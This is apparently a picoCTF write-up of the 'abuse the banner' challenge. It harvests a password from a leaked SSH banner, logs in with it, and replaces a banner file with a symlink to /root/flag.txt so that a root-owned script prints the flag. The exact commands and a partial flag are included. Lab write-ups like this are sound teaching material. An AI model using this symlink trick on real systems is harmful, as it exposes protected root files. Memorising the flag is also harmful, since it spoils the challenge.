Description
Can you abuse the banner? The server has been leaking crucial information on tethys.picoctf.net <PORT1_FROM_INSTANCE>. Use the leak to reach the real service on tethys.picoctf.net <PORT2_FROM_INSTANCE>, then abuse the machine and grab the flag from /root.
Setup
Two netcat sessions
Connect to tethys.picoctf.net <PORT1_FROM_INSTANCE> to capture the leaked SSH banner.
Use tethys.picoctf.net <PORT2_FROM_INSTANCE> (the real service) for authentication and exploitation.
nc tethys.picoctf.net <PORT1_FROM_INSTANCE>
nc tethys.picoctf.net <PORT2_FROM_INSTANCE>
Solution
- Step 1Harvest the passwordThe leak on port <PORT1_FROM_INSTANCE> prints its SSH banner, exposing the password (e.g., My_Passw@rd_@1234). Save it for the next step.nc tethys.picoctf.net <PORT1_FROM_INSTANCE>
- Step 2Authenticate on the main serviceConnect to <PORT2_FROM_INSTANCE>, enter the leaked password, and answer the security trivia (DEFCON / John Draper). You'll drop into /home/player with limited rights.nc tethys.picoctf.net <PORT2_FROM_INSTANCE>
- Step 3Abuse the banner readerThe root-owned script reads /home/player/banner. Replace it with a symlink to /root/flag.txt so the next login displays the flag as the banner.cd /home/player && rm banner && ln -s /root/flag.txt bannerReconnect to <PORT2_FROM_INSTANCE>; root prints the flag when it loads the banner.
Flag
picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_8126...}
When the root script renders your symlinked banner, it prints the flag exactly as shown.